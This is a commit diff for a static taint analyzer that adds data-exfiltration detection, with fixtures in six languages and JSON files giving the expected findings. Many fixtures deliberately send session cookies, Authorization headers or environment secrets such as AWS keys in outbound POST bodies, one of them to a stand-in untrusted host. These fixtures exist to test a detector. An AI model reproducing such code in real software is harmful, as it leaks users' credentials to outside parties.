Added Cap::DATA_EXFIL and taint fp and fn fixes on real repos (#59)

* feat: Enhance data exfiltration detection with source sensitivity gating for cookies and headers

* feat: Implement cross-file data exfiltration detection with parameter-specific gate filters

* feat: Add calibration tests and refine DATA_EXFIL severity scoring logic

* feat: Introduce per-detector configuration for data exfiltration suppression

* feat: Enhance DATA_EXFIL findings with destination field tracking in diagnostics and SARIF output

* feat: Add tainted body and URL handling for data exfiltration detection

* feat: Add integration tests and fixtures for DATA_EXFIL and SSRF detection in Go

* feat: Add Java integration tests and fixtures for DATA_EXFIL detection across multiple HTTP clients

* feat: Add synthetic externals handling for closure-captured variables in SSA

* feat: Implement closure-based suppression for resource leak findings

* feat: Add regression guards for shell-injection and taint propagation in for-of destructure patterns

* feat: Implement constructor cap narrowing for data exfiltration detection in HTTP request builders

* feat: Add gated sinks for data exfiltration detection in C and C++ using curl_easy_setopt

* feat: Implement DATA_EXFIL cap parity for backwards analysis and add integration tests

* feat: Add data exfiltration sinks for various languages and enhance documentation

* refactor: Simplify formatting and improve readability in various files

* refactor: Improve readability by simplifying conditional statements and adding clippy linting

* docs: Update CHANGELOG and comments for data exfiltration features and configuration

* docs: Clarify configuration instructions for data exfiltration trusted destinations

* docs: Enhance comments for evidence routing logic in data exfiltration
This commit is contained in:
Eli Peter 2026-05-01 10:59:52 -04:00 committed by GitHub
parent a438886217
commit 58f1794a4e
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
189 changed files with 8421 additions and 383 deletions

View file

@ -0,0 +1,16 @@
var express = require('express');
var { forward } = require('./helper');
var app = express();
// Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The
// session cookie is a Sensitive-tier source, so taint carries the
// DATA_EXFIL bit through to the wrapper's body-gate. SSRF must NOT
// fire — the URL is a hardcoded literal and the cap-vs-position split
// keeps the body's taint from leaking onto the URL's gate.
app.get('/sync', function(req, res) {
var sid = req.cookies.session; // source: session cookie read from the request
var payload = JSON.stringify({ session: sid }); // cookie value is serialized into the outbound body
forward('https://analytics.internal/track', payload); // literal URL in arg 0, cookie-derived body in arg 1
res.status(204).end();
});

View file

@ -0,0 +1,14 @@
var express = require('express');
var { forward } = require('./helper');
var app = express();
// Tainted URL, fixed body: SSRF must fire on the URL flow. DATA_EXFIL
// must NOT fire — the body is a literal string, not a sensitive source,
// and the cap-vs-position split through the wrapper's summary keeps the
// URL's taint from leaking onto the body's gate.
app.get('/proxy', function(req, res) {
var taintedUrl = req.query.url; // source: caller-supplied query parameter
forward(taintedUrl, '{"ok":true}'); // request-derived URL in arg 0, literal body in arg 1
res.status(204).end();
});

View file

@ -0,0 +1,22 @@
{
"required_findings": [
{ "id_prefix": "taint-unsanitised-flow", "min_count": 1 },
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [
{
"id_prefix": "taint-data-exfiltration",
"file_glob": "**/caller_url_tainted.js"
},
{
"id_prefix": "taint-unsanitised-flow",
"file_glob": "**/caller_body_tainted.js"
}
],
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,10 @@
// Wrapper around `fetch` whose two parameters target distinct gated-sink
// classes on the inner call: `url` is the SSRF gate's destination; `body`
// is the DATA_EXFIL gate's payload. Pass-1 SSA summary extraction lifts
// the per-position cap split into `param_to_gate_filters` so cross-file
// callers can attribute SSRF vs DATA_EXFIL per argument.
function forward(url, body) {
fetch(url, { method: 'POST', body: body }); // `url` is the destination; `body` is passed through as the POST payload
}
module.exports = { forward };

View file

@ -0,0 +1,17 @@
// Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The
// session cookie is a Sensitive-tier source, so taint carries the
// DATA_EXFIL bit through to the wrapper's `http.Post` body gate. SSRF must NOT fire —
// the URL is a hardcoded literal and per-position cap attribution keeps
// the body's taint from leaking onto the URL's gate.
package fixture
import (
"net/http"
"strings"
)
func SyncCookie(r *http.Request) {
c, _ := r.Cookie("session") // source: session cookie; the lookup error is discarded
body := strings.NewReader(c.Value) // cookie value wrapped as a reader for the request body
Forward("https://analytics.internal/track", body) // literal URL, cookie-derived body
}

View file

@ -0,0 +1,16 @@
// Tainted URL, hardcoded body: SSRF must fire on the URL flow. The
// query param is a `Plain` user-input source, so even though it carries
// `Cap::all()` upstream the source-sensitivity gate strips DATA_EXFIL
// for plain inputs. Only SSRF survives.
package fixture
import (
"net/http"
"strings"
)
func ProxyTarget(r *http.Request) {
target := r.URL.Query().Get("target") // source: caller-supplied query parameter
body := strings.NewReader("hardcoded") // body is built from a string literal only
Forward(target, body) // request-derived URL, literal body
}

View file

@ -0,0 +1,22 @@
{
"required_findings": [
{ "id_prefix": "taint-unsanitised-flow", "min_count": 1 },
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [
{
"id_prefix": "taint-data-exfiltration",
"file_glob": "**/caller_url_tainted.go"
},
{
"id_prefix": "taint-unsanitised-flow",
"file_glob": "**/caller_body_tainted.go"
}
],
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,16 @@
// Wrapper whose two parameters target distinct gated-sink classes on the
// inner call: `url` is the SSRF gate's destination at `http.Post`'s
// arg 0; `body` is the DATA_EXFIL gate's payload at arg 2. Pass-1 SSA
// summary extraction lifts the per-position cap split into
// `param_to_gate_filters` so cross-file callers attribute SSRF vs
// DATA_EXFIL per argument.
package fixture
import (
"io"
"net/http"
)
func Forward(url string, body io.Reader) {
http.Post(url, "text/plain", body) // `url` is arg 0, `body` is arg 2; the response and error are ignored
}

View file

@ -0,0 +1,18 @@
"""Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The
session cookie is a Sensitive-tier source, so taint carries the
DATA_EXFIL bit through to the wrapper's body-gate. SSRF must NOT fire —
the URL is a hardcoded literal and the cap-vs-position split keeps the
body's taint from leaking onto the URL's gate.
"""
from flask import Flask, session
from helper import forward
app = Flask(__name__)
@app.route('/sync')
def sync():
sid = session.get('user_token')  # source: value read from the Flask session
forward('https://analytics.internal/track', {'session': sid})  # literal URL, session-derived body
return '', 204

View file

@ -0,0 +1,17 @@
"""Tainted URL, fixed body: SSRF must fire on the URL flow. DATA_EXFIL
must NOT fire — the body is a literal dict, not a sensitive source, and
the cap-vs-position split through the wrapper's summary keeps the URL's
taint from leaking onto the body's gate.
"""
from flask import Flask, request
from helper import forward
app = Flask(__name__)
@app.route('/proxy', methods=['POST'])
def proxy():
tainted_url = request.args.get('url')  # source: caller-supplied query parameter
forward(tainted_url, {'event': 'proxy_call'})  # request-derived URL, literal dict body
return '', 204

View file

@ -0,0 +1,22 @@
{
"required_findings": [
{ "id_prefix": "taint-unsanitised-flow", "min_count": 1 },
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [
{
"id_prefix": "taint-data-exfiltration",
"file_glob": "**/caller_url_tainted.py"
},
{
"id_prefix": "taint-unsanitised-flow",
"file_glob": "**/caller_body_tainted.py"
}
],
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,12 @@
"""Wrapper around requests.post whose two parameters target distinct
gated-sink classes on the inner call: `url` is the SSRF gate's destination
(arg 0); `body` is the DATA_EXFIL gate's payload (json kwarg). Pass-1 SSA
summary extraction lifts the per-position cap split into
`param_to_gate_filters` so cross-file callers can attribute SSRF vs
DATA_EXFIL per argument.
"""
import requests
def forward(url, body):
requests.post(url, json=body)  # `url` is positional arg 0; `body` is sent via the `json` keyword

View file

@ -0,0 +1,20 @@
"""demand_driven_data_exfil.
`Cap::DATA_EXFIL` parity for the backwards-analysis pass. The forward
engine emits a `taint-data-exfiltration` finding for the cookie →
`requests.post` body flow (Sensitive source, fixed destination URL). With
`backwards_analysis = true`, the post-pass must walk backwards from the
DATA_EXFIL sink demand, reach the cookie source, and annotate the
finding with `backwards-confirmed`. Validates that the cap-routing
logic in `taint/backwards.rs::DemandState` round-trips bit 13
(DATA_EXFIL) identically to the SQL/CMD/SSRF caps the rest of the
demand-driven suite covers.
"""
import requests
from flask import request
def forward_session():
sid = request.cookies.get("session")  # source: session cookie from the Flask request
requests.post("https://analytics.internal/track", json={"session": sid})  # literal URL; cookie sent in the JSON body

View file

@ -0,0 +1,16 @@
{
"required_findings": [
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [],
"noise_budget": {
"max_total_findings": 4,
"max_high_findings": 2
},
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,19 @@
// DATA_EXFIL fixture: a fixed destination URL and a Sensitive (cookie)
// source flowing into the outbound body of `http.Post`. SSRF must NOT
// fire (URL is hardcoded, position 0) but `Cap::DATA_EXFIL` must fire on
// the body (position 2) — the auth cookie is exactly the cross-boundary
// state DATA_EXFIL targets.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"strings"
)
func leakCookie(r *http.Request) {
c, _ := r.Cookie("session") // source: session cookie; the lookup error is discarded
body := strings.NewReader(c.Value) // cookie value wrapped as a reader for the request body
http.Post("https://analytics.internal/track", "text/plain", body) // literal URL (arg 0), cookie-derived body (arg 2)
}

View file

@ -0,0 +1,27 @@
// Container-taint DATA_EXFIL: a `url.Values` map (`map[string][]string`) is
// populated with Sensitive cookie values across two keys, then encoded as
// form data and shipped as the body of an outbound `http.PostForm`. The Go
// SSA heap model marks the map's `Elements` slot tainted on every
// `form[k] = ...` write; the sink-side `collect_tainted_sink_values` heap-loads
// the same slot when checking the form-data argument, so DATA_EXFIL
// must fire on the body channel even though the local map name itself
// is not directly tainted by an Assign. Pairs with
// `data_exfil_post_form.go` (single-write `url.Values` literal — no
// container-mutation step).
//
// Driven by `data_exfil_go_integration_tests.rs::map_assign_data_exfil`.
package fixture
import (
"net/http"
"net/url"
)
func leakSessionMap(r *http.Request) {
c, _ := r.Cookie("session") // source 1: session cookie (lookup error discarded)
a, _ := r.Cookie("auth") // source 2: auth cookie (lookup error discarded)
form := url.Values{} // starts empty; populated only by the index writes below
form["session"] = []string{c.Value}
form["auth"] = []string{a.Value}
http.PostForm("https://analytics.internal/track", form) // literal URL; the populated map is the form payload
}

View file

@ -0,0 +1,24 @@
// DATA_EXFIL fixture for the two-step `http.NewRequest` → `client.Do`
// idiom. `http.NewRequest` is modeled as a body propagator (default
// arg → return propagation lifts body taint onto the returned
// `*http.Request`); the outbound network call happens at
// `http.DefaultClient.Do`, where the DATA_EXFIL gate fires on the
// request argument.
//
// SSRF must NOT fire (URL is hardcoded at NewRequest's URL position) and
// the cookie-derived body must surface DATA_EXFIL at the Do call.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"strings"
)
func leakViaNewRequest(r *http.Request) {
c, _ := r.Cookie("session") // source: session cookie; the lookup error is discarded
body := strings.NewReader(c.Value) // cookie value wrapped as a reader for the request body
req, _ := http.NewRequest("POST", "https://analytics.internal/track", body) // step 1: literal URL, cookie-derived body
http.DefaultClient.Do(req) // step 2: the request built above is actually sent here
}

View file

@ -0,0 +1,18 @@
// DATA_EXFIL fixture: a Sensitive (header) source flowing into the form
// payload of `http.PostForm` (arg 1, `url.Values`). The destination URL
// is hardcoded so SSRF does not fire; only the form-data path activates
// the body-position gate.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"net/url"
)
func leakAuthHeader(r *http.Request) {
auth := r.Header.Get("Authorization") // source: Authorization header of the incoming request
form := url.Values{"token": []string{auth}} // header value placed in the map by a single literal, no later writes
http.PostForm("https://analytics.internal/track", form) // literal URL (arg 0), form payload (arg 1)
}

View file

@ -0,0 +1,19 @@
// DATA_EXFIL silenced regression fixture: plain user input echoed into
// the body of an outbound `http.Post` to a fixed URL must NOT fire
// `Cap::DATA_EXFIL`. The user already controls `r.FormValue("msg")`, so
// surfacing it back into the request payload is not a cross-boundary
// disclosure. Source-sensitivity gating in `ast.rs` strips the cap.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"strings"
)
func forwardUserInput(r *http.Request) {
msg := r.FormValue("msg") // source: caller-supplied form value
body := strings.NewReader(msg) // form value wrapped as a reader for the request body
http.Post("https://analytics.internal/track", "text/plain", body) // literal URL (arg 0), user-supplied body (arg 2)
}

18
tests/fixtures/go/ssrf_url_tainted.go vendored Normal file
View file

@ -0,0 +1,18 @@
// SSRF regression fixture: attacker-controlled destination URL flows
// into `http.NewRequest`'s URL position (arg 1). SSRF must fire on the
// URL flow; DATA_EXFIL must NOT fire (the body is hardcoded `nil`).
// Cap attribution is per-position so a tainted URL never surfaces as
// data exfiltration.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
)
func proxy(r *http.Request) {
target := r.URL.Query().Get("target") // source: caller-supplied query parameter
req, _ := http.NewRequest("GET", target, nil) // request-derived URL in arg 1; body is nil
http.DefaultClient.Do(req) // the request built above is sent here
}

View file

@ -0,0 +1,27 @@
// DATA_EXFIL fixture: Apache HttpClient. A request cookie (Sensitive)
// is wrapped in a StringEntity (default smear) and attached to an
// HttpPost via setEntity (also default smear). The network call
// happens at `httpClient.execute(req)`, which type-qualified resolution
// rewrites to `HttpClient.execute` via JAVA_HIERARCHY
// (CloseableHttpClient subtypes HttpClient). SSRF must NOT fire (URL
// is a hardcoded constant on the HttpPost ctor).
//
// Driven by `data_exfil_java_integration_tests.rs`.
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
import org.apache.http.HttpResponse;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
public class DataExfilApacheHttpClient {
public void leak(HttpServletRequest request) throws Exception {
Cookie[] cookies = request.getCookies();
String session = cookies[0].getValue(); // source: value of the first request cookie
CloseableHttpClient httpClient = HttpClients.createDefault();
HttpPost req = new HttpPost("https://analytics.internal/track"); // destination is a string literal
req.setEntity(new StringEntity(session)); // cookie value becomes the request entity
HttpResponse resp = httpClient.execute(req); // outbound call; `resp` is not used afterwards
}
}

View file

@ -0,0 +1,28 @@
// DATA_EXFIL fixture: java.net.http chain. A Sensitive source (cookie)
// flows through `BodyPublishers.ofString(payload)` and the request
// builder chain into `client.send(req)` at a hardcoded URL. SSRF must
// NOT fire (URL is a fixed string) and `Cap::DATA_EXFIL` must fire
// because the cookie is exactly the cross-boundary state the cap
// targets.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
public class DataExfilJdkHttpClient {
public void leak(HttpServletRequest request) throws Exception {
Cookie[] cookies = request.getCookies();
String session = cookies[0].getValue(); // source: value of the first request cookie
HttpClient client = HttpClient.newHttpClient();
HttpRequest req = HttpRequest.newBuilder()
.uri(URI.create("https://analytics.internal/track")) // destination is a string literal
.POST(BodyPublishers.ofString(session)) // cookie value becomes the POST body
.build();
client.send(req, BodyHandlers.ofString()); // outbound call; the response is discarded
}
}

View file

@ -0,0 +1,28 @@
// DATA_EXFIL fixture: OkHttp two-step. A session attribute (Sensitive)
// is wrapped via `RequestBody.create` (default arg → return smear)
// and bound to the request via the builder chain. The network call
// happens at `client.newCall(req).execute()` which hits the
// chain-normalized `newCall.execute` matcher. SSRF must NOT fire on
// the hardcoded URL.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import javax.servlet.http.HttpSession;
import okhttp3.MediaType;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.RequestBody;
import okhttp3.Response;
public class DataExfilOkHttp {
public void leak(HttpSession session) throws Exception {
String token = (String) session.getAttribute("csrfToken"); // source: session attribute
OkHttpClient client = new OkHttpClient();
RequestBody body = RequestBody.create(
token, MediaType.parse("text/plain")); // session-derived token wrapped as the request body
Request req = new Request.Builder()
.url("https://analytics.internal/track") // destination is a string literal
.post(body)
.build();
Response resp = client.newCall(req).execute(); // outbound call; `resp` is not used afterwards
}
}

View file

@ -0,0 +1,23 @@
// DATA_EXFIL fixture: Spring RestTemplate. An HTTP header value (a
// Sensitive source) flows directly into the request body of
// `restTemplate.postForObject(url, body, type)`. The destination URL
// is hardcoded so SSRF must NOT fire. `Cap::DATA_EXFIL` must fire on
// the body position. Type-qualified resolution rewrites
// `restTemplate.postForObject` to `HttpClient.postForObject` via the
// JAVA_HIERARCHY (RestTemplate subtypes HttpClient), reusing the same
// flat sink rule the JDK client uses.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import javax.servlet.http.HttpServletRequest;
import org.springframework.web.client.RestTemplate;
public class DataExfilRestTemplate {
public void leak(HttpServletRequest request) {
String authHeader = request.getHeader("Authorization"); // source: Authorization header of the incoming request
RestTemplate restTemplate = new RestTemplate();
restTemplate.postForObject(
"https://analytics.internal/track", // arg 0: destination is a string literal
authHeader, // arg 1: header value sent as the request body
String.class); // arg 2: response type; the returned value is discarded
}
}

View file

@ -0,0 +1,20 @@
// DATA_EXFIL fixture: Spring WebClient. A Sensitive source (env var)
// flows through `.bodyValue(payload)` on a fixed-URL chain. SSRF must
// NOT fire (URL is hardcoded) and `Cap::DATA_EXFIL` must fire at the
// body-binding step, since the bare-name `bodyValue` matcher hits
// independent of receiver type.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import org.springframework.web.reactive.function.client.WebClient;
public class DataExfilWebClient {
public void leak() {
String secret = System.getenv("AWS_SECRET_ACCESS_KEY"); // source: environment variable
WebClient webClient = WebClient.create();
webClient.post()
.uri("https://analytics.internal/track") // destination is a string literal
.bodyValue(secret) // env value bound as the request body
.retrieve()
.bodyToMono(String.class); // the resulting Mono is discarded
}
}

View file

@ -0,0 +1,25 @@
// Regression fixture: a tainted URL flowing into HttpClient.send must
// fire SSRF (taint-unsanitised-flow) but must NOT fire DATA_EXFIL.
// The body is a hardcoded literal so no Sensitive payload reaches the
// outbound request. This guards against over-firing DATA_EXFIL on
// flows where only the URL position is attacker-controlled.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import javax.servlet.http.HttpServletRequest;
public class SsrfUrlOnlyNoDataExfil {
public void doGet(HttpServletRequest request) throws Exception {
String target = request.getParameter("url"); // source: caller-supplied request parameter
HttpClient client = HttpClient.newHttpClient();
HttpRequest req = HttpRequest.newBuilder()
.uri(URI.create(target)) // request-derived destination
.POST(BodyPublishers.ofString("ping")) // body is a string literal
.build();
client.send(req, BodyHandlers.ofString()); // outbound call; the response is discarded
}
}

View file

@ -1,11 +1,15 @@
// DATA_EXFIL fixture: a fixed destination URL and an attacker-influenced
// body. SSRF must NOT fire (destination is hardcoded) but `Cap::DATA_EXFIL`
// must fire on the body field — request-bound bytes are leaving the process
// via the outbound request payload.
// DATA_EXFIL fixture: a fixed destination URL and a sensitive (cookie /
// session) source flowing into the outbound body. SSRF must NOT fire
// (destination is hardcoded) but `Cap::DATA_EXFIL` must fire because the
// source is Sensitive (`req.cookies.session` carries auth material) — exactly
// the cross-boundary leak the cap targets.
//
// Plain user input echoed back into a body is intentionally not classified
// as data exfiltration, see `fetch_body_user_input_silenced.js`.
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function leakBody(req) {
var payload = req.body.message;
var payload = req.cookies.session;
fetch('/endpoint', {
method: 'POST',
body: payload,

View file

@ -0,0 +1,19 @@
// DATA_EXFIL type-suppression fixture: a Sensitive cookie source coerced
// to an integer via `parseInt(...)` is NOT a credential payload; the
// resulting numeric body cannot encode a session token, header secret, or
// other exfiltratable material. The type-aware sink suppression in
// `is_type_safe_for_sink` (see `src/ssa/type_facts.rs`) recognises the
// proven-`Int` SSA value at the gate and silences the cap.
//
// Negative regression: without DATA_EXFIL in the type-suppressible mask
// this would over-fire on every `fetch({ body: parseInt(req.cookies.x) })`
// pattern (e.g. analytics ingestion of session counters).
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function reportSessionCount(req) {
var count = parseInt(req.cookies.session_count, 10); // cookie value coerced to a base-10 integer
fetch('/metrics', { // destination is a string literal
method: 'POST',
body: count, // only the parsed number is sent
});
}

View file

@ -0,0 +1,15 @@
// DATA_EXFIL silenced regression fixture: plain user input echoed into the
// body of an outbound `fetch` to a fixed URL must NOT fire `Cap::DATA_EXFIL`.
// The user already controls `req.body.message` — surfacing it back into the
// request payload is not a cross-boundary disclosure. This is the canonical
// false-positive class for API gateways and telemetry forwarders that proxy
// `req.body`, killed by the source-sensitivity gate in `ast.rs`.
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function forward(req) {
var payload = req.body.message; // source: field of the incoming request body
fetch('/endpoint', { // destination is a string literal
method: 'POST',
body: payload, // request-body field forwarded unchanged
});
}

View file

@ -0,0 +1,17 @@
// DATA_EXFIL allowlist-suppression fixture.
//
// The destination URL has a static prefix (`https://api.internal/...`) that
// the test harness installs as a trusted destination via
// [detectors.data_exfil.trusted_destinations]. The body still carries a
// Sensitive source (`req.cookies.session`), but routing it through a known-
// trusted upstream is a *legitimate* forwarding pipeline: the cap is
// suppressed for this filter only.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function leakBody(req) {
var payload = req.cookies.session; // source: session cookie
fetch('https://api.internal/forward', { // literal URL under the `https://api.internal/` prefix
method: 'POST',
body: payload, // cookie value sent as the body
});
}

View file

@ -0,0 +1,15 @@
// DATA_EXFIL allowlist-NEGATIVE fixture.
//
// The destination URL prefix (`https://untrusted.example.com/`) is NOT
// covered by the harness-installed
// [detectors.data_exfil.trusted_destinations] entries, so the cap MUST
// still fire on a Sensitive source flowing into the body.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function leakBodyExternal(req) {
var payload = req.cookies.session; // source: session cookie
fetch('https://untrusted.example.com/intake', { // literal URL under the `https://untrusted.example.com/` prefix
method: 'POST',
body: payload, // cookie value sent as the body
});
}

View file

@ -0,0 +1,13 @@
// DATA_EXFIL sanitizer-convention fixture.
//
// `logEvent({user: req.cookies.session})` routes a Sensitive cookie source
// through a named telemetry boundary. The forwarding-wrapper convention
// (see docs/detectors/taint.md) treats `logEvent` as a default
// `Sanitizer(Cap::DATA_EXFIL)` so the cap does NOT fire on this call.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function track(req) {
logEvent({ // the only call in this function; no `fetch` is made here
user: req.cookies.session, // source: session cookie passed as the `user` field
});
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <stdlib.h>
void leak_env() {
char *token = getenv("AUTH_TOKEN"); /* source: environment variable */
if (!token) return; /* nothing to send when the variable is unset */
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track"); /* destination is a string literal */
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token); /* env value bound as the POST body */
curl_easy_perform(curl); /* the transfer runs here */
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink: the activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call (not at the CURLOPT_URL setopt above it). getenv(\"AUTH_TOKEN\") is Sensitivity::Sensitive so DATA_EXFIL must fire.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [4, 12],
"notes": "getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS."
}
]
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <stdio.h>
void forward_stdin() {
char input[256];
if (!fgets(input, sizeof(input), stdin)) return; /* source: one line read from stdin; return if nothing was read */
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward"); /* destination is a string literal */
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input); /* stdin line bound as the POST body */
curl_easy_perform(curl); /* the transfer runs here */
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (fgets/stdin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input) and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.c to assert per-tier routing for C.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [4, 12],
"notes": "Body source is plain user input (fgets from stdin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <cstdlib>
void leak_env() {
const char *token = std::getenv("AUTH_TOKEN"); // source: environment variable
if (!token) return; // nothing to send when the variable is unset
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track"); // destination is a string literal
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token); // env value bound as the POST body
curl_easy_perform(curl); // the transfer runs here
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink in C++: same gating model as the C fixture. The activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call. std::getenv is Sensitivity::Sensitive so DATA_EXFIL must fire.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [4, 12],
"notes": "std::getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS."
}
]
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <cstdio>
void forward_stdin() {
char input[256];
if (!fgets(input, sizeof(input), stdin)) return; // source: one line read from stdin; return if nothing was read
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward"); // destination is a string literal
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input); // stdin line bound as the POST body
curl_easy_perform(curl); // the transfer runs here
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (fgets from stdin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input) and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.cpp to assert per-tier routing for C++.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [4, 12],
"notes": "Body source is plain user input (fgets from stdin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,19 @@
{
"description": "Container-taint DATA_EXFIL: tokens array pushed with req.cookies.session is JSON-stringified into a fetch body. The SSA heap Elements slot carries the cap from `tokens.push(...)` to the sink-side `collect_tainted_sink_values` heap-load, so DATA_EXFIL must fire on the body field even though `payload` itself is not directly tainted by an Assign.",
"tags": ["taint", "data-exfil", "fetch", "container", "heap-elements", "cookie", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [12, 17],
"notes": "tokens.push(req.cookies.session) → JSON.stringify({batch: tokens}) → fetch body. Heap Elements taint must round-trip through the container."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [12, 17],
"notes": "fetch URL is a fixed literal — body taint must not surface as SSRF."
}
]
}

View file

@ -0,0 +1,21 @@
var express = require('express');
var app = express();
// Container-taint DATA_EXFIL: push a Sensitive cookie source into an
// array, then send the JSON-stringified batch as the outbound `fetch` body. The
// SSA heap model marks the array's `Elements` slot tainted at the
// `tokens.push(...)` write; the sink-side `collect_tainted_sink_values`
// loads the same slot and observes the cap, so DATA_EXFIL must fire on
// the body channel even though the body var (`payload`) is not directly
// tainted. Pairs with `array_push_taint.js` (same shape, different
// sink: XSS).
app.post('/batch', function(req, res) {
var tokens = []; // starts empty; the cookie arrives only through the push below
tokens.push(req.cookies.session); // source: session cookie stored as an array element
var payload = JSON.stringify({ batch: tokens }); // array serialized into the body string
fetch('https://analytics.internal/track', { // destination is a string literal
method: 'POST',
body: payload,
});
res.status(204).end();
});

View file

@ -0,0 +1,19 @@
{
